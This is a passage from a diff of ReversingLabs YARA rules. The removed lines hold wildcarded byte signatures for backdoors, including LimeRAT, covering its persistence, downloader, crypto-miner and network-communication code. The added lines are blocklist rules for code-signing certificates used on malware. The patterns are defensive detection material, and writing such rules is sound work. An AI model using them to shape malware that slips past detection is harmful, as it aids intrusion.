?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? - 1F ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F - ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ?? - 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 7E - ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 7E ?? - ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? - ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 25 28 ?? ?? ?? ?? 13 - ?? 00 28 ?? ?? ?? ?? DE ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 16 80 ?? ?? ?? ?? 28 - ?? ?? ?? ?? DE ?? 00 00 DE ?? 11 ?? 28 ?? ?? ?? ?? 00 DC 7E ?? ?? ?? ?? 0A 2B ?? 06 - } - $send_v1 = { - 00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 16 0A 38 ?? ?? ?? ?? 00 00 7E ?? - ?? ?? ?? 0B 00 07 13 ?? 11 ?? 28 ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13 - ?? 11 ?? 2C ?? 16 0A DD ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 13 ?? 02 8E B7 0D 12 ?? 28 ?? - ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 0C 11 ?? 08 16 08 - 8E B7 6F ?? ?? ?? ?? 00 11 ?? 02 16 02 8E B7 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? - ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 16 11 ?? 6F ?? ?? ?? ?? B7 16 6F ?? ?? ?? ?? 26 00 DE - ?? 11 ?? 28 ?? ?? ?? ?? 00 DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 11 ?? 28 ?? ?? ?? ?? - 00 11 ?? 13 ?? 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 16 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? - 6F ?? ?? ?? ?? 00 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 28 ?? - ?? ?? ?? DE ?? 00 7E ?? ?? ?? ?? 0A 2B ?? 06 - } - $receive_v1_p1 = { - 00 00 00 72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ?? - 13 ?? 11 ?? 39 ?? ?? ?? ?? 15 6A 0A 16 0B 00 00 00 07 17 D6 0B 07 1F ?? (FE | 01) ?? - 13 ?? 11 ?? 2C ?? 16 0B 17 28 ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 16 (FE | 01) ?? 13 ?? - 11 ?? 2C ?? 00 DD ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 (FE | 04) ?? 13 ?? - 11 ?? 2C ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 15 16 6F ?? ?? ?? ?? 26 00 00 00 7E ?? ?? - ?? ?? 6F ?? ?? ?? ?? 16 (FE | 02) ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 06 15 6A (FE | 01) ?? - 13 ?? 11 ?? 39 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? - ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 00 11 ?? 15 59 13 ?? 11 ?? 45 ?? ?? ?? ?? ?? ?? ?? ?? - ?? ?? ?? ?? 2B ?? 00 00 DD ?? ?? ?? ?? 2B ?? 00 11 ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? - ?? 13 ?? 06 16 6A (FE | 01) ?? 13 ?? 11 ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 15 - 6A 0A 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 (FE | 02) ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C - ?? 38 ?? ?? ?? ?? 00 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? - ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 00 17 13 ?? 11 ?? 3A ?? - ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 D6 17 DA 17 D6 8D ?? ?? ?? ?? 80 ?? ?? - ?? ?? 06 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DA 0D 7E ?? ?? ?? ?? 8E B7 6A 09 (FE | 02) - } - $receive_v1_p2 = { - 13 ?? 11 ?? 2C ?? 09 17 6A DA B7 17 D6 17 DA 17 D6 8D ?? ?? ?? ?? 80 ?? ?? ?? ?? 00 - 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E B7 16 6F ?? ?? ?? - ?? 0C 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 08 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? - ?? ?? 06 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 15 6A 0A 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? - ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 - 11 ?? 1F ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 80 ?? - ?? ?? ?? 00 38 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? - 00 00 00 00 00 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 7E ?? - ?? ?? ?? 28 ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 14 14 14 17 28 ?? ?? ?? - ?? 26 14 80 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 - 16 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ?? 2B ?? 00 17 80 ?? - ?? ?? ?? 38 ?? ?? ?? ?? 00 - } - $connect_v2 = { - 16 80 ?? ?? ?? ?? 20 D0 07 00 00 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 0A 06 25 13 ?? 28 ?? - ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 14 80 ?? ?? ?? ?? DE ?? - 26 DE ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? DE ?? 26 DE ?? 73 ?? ?? ?? ?? - 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ?? - ?? ?? 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 - 10 27 00 00 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ?? - ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 80 - ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 72 ?? - ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 07 7F ?? ?? ?? ?? 28 - ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 2B ?? 07 0C 72 ?? ?? ?? ?? 72 ?? ?? ?? - ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 08 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 0B 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 07 A2 11 ?? 17 7E ?? ?? ?? ?? A2 11 ?? 18 - 72 ?? ?? ?? ?? A2 11 ?? 19 7E ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 28 ?? - ?? ?? ?? 0B 07 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 7E - ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B - 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? - ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? DE ?? 26 16 80 ?? ?? ?? ?? DE ?? - DE ?? 11 ?? 28 ?? ?? ?? ?? DC 7E - } - $receive_v2 = { - 72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 15 6A 0A 16 0B 07 17 D6 - 0B 07 1F ?? 33 ?? 16 0B 17 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 7E ?? ?? ?? - ?? 6F ?? ?? ?? ?? 17 3C ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 15 16 6F ?? ?? ?? - ?? 26 38 ?? ?? ?? ?? 06 15 6A 3B ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 D6 8D - ?? ?? ?? ?? 80 ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DA 0C 7E ?? ?? ?? ?? 8E - 69 6A 08 31 ?? 08 17 6A DA B7 17 D6 8D ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F - ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E 69 16 6F ?? ?? ?? ?? 0D 7E ?? ?? ?? - ?? 7E ?? ?? ?? ?? 16 09 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 40 ?? ?? ?? - ?? 15 6A 0A 7E ?? ?? ?? ?? 2D ?? 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? - ?? ?? 7E ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F - ?? ?? ?? ?? 11 ?? 1F ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? - ?? 80 ?? ?? ?? ?? 38 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? - 6F ?? ?? ?? ?? 13 ?? 11 ?? 15 2E ?? 11 ?? 2C ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 12 - ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 28 - ?? ?? ?? ?? 0A 06 16 6A 33 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 15 6A 0A 7E ?? ?? ?? - ?? 6F ?? ?? ?? ?? 16 3E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? DE - ?? 26 DE ?? 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ?? - 14 14 14 17 28 ?? ?? ?? ?? 26 14 80 ?? ?? ?? ?? DE ?? 26 DE ?? 16 80 ?? ?? ?? ?? 28 - ?? ?? ?? ?? 2C ?? 17 80 - } - $get_system_information_v2_p1 = { - 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 06 0B 7F ?? ?? ?? ?? 28 ?? ?? ?? ?? - 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 07 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? - ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 0D 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 - ?? 09 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 13 ?? 28 ?? - ?? ?? ?? 13 ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06 - 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 7E ?? ?? - ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE - ?? 26 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06 7E ?? ?? ?? ?? 6F - ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E - ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? - ?? 0A DE ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 28 - ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 0A DE ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? - ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 33 ?? 06 72 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 0A 06 11 ?? 11 ?? 8E 69 17 DA 9A 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 - } - $get_system_information_v2_p2 = { - 28 ?? ?? ?? ?? 0A DE ?? 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 06 - 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ?? - ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 28 ?? ?? ?? - ?? 2C ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 72 ?? ?? ?? ?? - 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A - 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? - 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? - 28 ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A - 13 ?? 11 ?? 6F ?? ?? ?? ?? 1F ?? 33 ?? 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 - ?? 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 06 11 ?? 28 - } - $send_v2 = { - 7E ?? ?? ?? ?? 2D ?? 16 2A 7E ?? ?? ?? ?? 0A 06 25 13 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? - ?? 2D ?? 16 13 ?? DD ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 02 8E 69 13 ?? 12 ?? 28 ?? ?? ?? - ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 12 ?? 28 ?? ?? ?? ?? 0D 07 09 16 09 8E 69 6F ?? - ?? ?? ?? 07 02 16 02 8E 69 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 6F ?? ?? - ?? ?? 16 07 6F ?? ?? ?? ?? B7 16 6F ?? ?? ?? ?? 26 07 6F ?? ?? ?? ?? DE ?? 11 ?? 28 - ?? ?? ?? ?? DC DE ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 16 80 ?? ?? ?? - ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 28 ?? ?? ?? ?? DE ?? 7E ?? ?? ?? ?? - 2A 11 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PHL E STATE ApS" and (pe.signatures[i].serial=="00:b2:f9:c6:93:a2:e6:63:45:65:f6:3c:79:b0:1d:d8:f8" or pe.signatures[i].serial=="b2:f9:c6:93:a2:e6:63:45:65:f6:3c:79:b0:1d:d8:f8") and 1620000000<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_54A6D33F73129E0Ef059Ccf51Be0C35E : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "1cf2bda8-05e6-5f0a-a28a-2f5fa02775c9" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12012-L12028" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6fbed9c8537ea2baeb58044a934fc9741730b8a3ae4d059c23b033973d7ff7d3" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ((( all of ($persistence_mechanism_v1_p*)) and ( all of ($connect_v1_p*)) and ($send_v1) and ( all of ($receive_v1_p*))) or (($connect_v2) and ($receive_v2) and ( all of ($get_system_information_v2_p*)) and ($send_v2))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "STAFFORD MEAT COMPANY, INC." and pe.signatures[i].serial=="54:a6:d3:3f:73:12:9e:0e:f0:59:cc:f5:1b:e0:c3:5e" and 1607100127<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Limerat : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_142Aac4217E22B525C8587589773Ba9B : INFO FILE { meta: - description = "Yara rule that detects LimeRAT backdoor." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c2ef6f27-3fb8-55f4-97a6-9e25a3d1ce49" - date = "2024-03-04" - modified = "2024-03-04" + id = "488be2f7-e3d4-51e3-b7bb-142caa7b2bd5" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/backdoor/ByteCode.MSIL.Backdoor.LimeRAT.yara#L1-L91" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "03eaa2ac41950f036601222b32a28c03aae3b3445501e988e2f87e231a1a1522" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12030-L12046" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f169925c27f5e0f8d5f658b83d1b9fa4548c4443b16bd4d7f87aa2b8e44bf06b" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Backdoor" - tc_detection_name = "LimeRAT" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $persistence_mechanism = { - 02 2C ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 28 ?? ?? ?? ?? 16 16 15 28 ?? ?? ?? ?? 26 2B ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? - ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 28 ?? ?? - ?? ?? 28 ?? ?? ?? ?? DE - } - $crypto_miner = { - 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 8E 69 16 31 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 0B 07 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 6F ?? ?? ?? ?? 0D 2B ?? 09 6F ?? ?? - ?? ?? 74 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F - ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 0A DE ?? 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09 2C ?? 09 - 6F ?? ?? ?? ?? DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? 28 ?? ?? ?? ?? - 0A DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? 06 - } - $downloader = { - 73 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 7E - ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? - ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 06 7E ?? ?? ?? ?? 07 6F ?? - ?? ?? ?? 07 28 ?? ?? ?? ?? 26 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ?? - 06 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 26 00 06 6F ?? ?? ?? ?? 14 0A - DE ?? 25 28 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? DE ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ?? - ?? ?? DE - } - $network_communication_p1 = { - 16 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0B 28 ?? ?? - ?? ?? DE ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0C 28 ?? ?? ?? - ?? DE ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ?? - DE ?? 00 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? - 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 15 6F ?? ?? ?? ?? 7E ?? - ?? ?? ?? 15 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 73 ?? - ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 14 72 ?? ?? ?? ?? 17 8D ?? ?? ?? ?? - 25 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 14 14 14 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? - ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 16 9A 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 26 11 - ?? 73 ?? ?? ?? ?? 17 11 ?? 8E 69 6F ?? ?? ?? ?? 9A 28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 11 - ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? DE ?? 11 ?? 2C - ?? 11 ?? 6F ?? ?? ?? ?? DC 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? - ?? 17 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 16 72 ?? - ?? ?? ?? A2 25 17 7E ?? ?? ?? ?? A2 25 18 28 ?? ?? ?? ?? A2 25 19 7E ?? ?? ?? ?? A2 - } - $network_communication_p2 = { - 25 1A 28 ?? ?? ?? ?? A2 25 1B 7E ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? A2 25 1D 7E ?? - ?? ?? ?? A2 25 1E 28 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? - ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? - A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 - 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 - 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? 8C ?? ?? - ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? - ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? - A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 - 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 2B ?? 7E - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "A.B. gostinstvo trgovina posredni\\xC5\\xA1tvo in druge storitve, d.o.o." and pe.signatures[i].serial=="14:2a:ac:42:17:e2:2b:52:5c:85:87:58:97:73:ba:9b" and 1614124800<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_239664C12Baeb5A6D787912888051392 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "4d24a880-6fa5-5c22-875e-29f4985e3750" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = 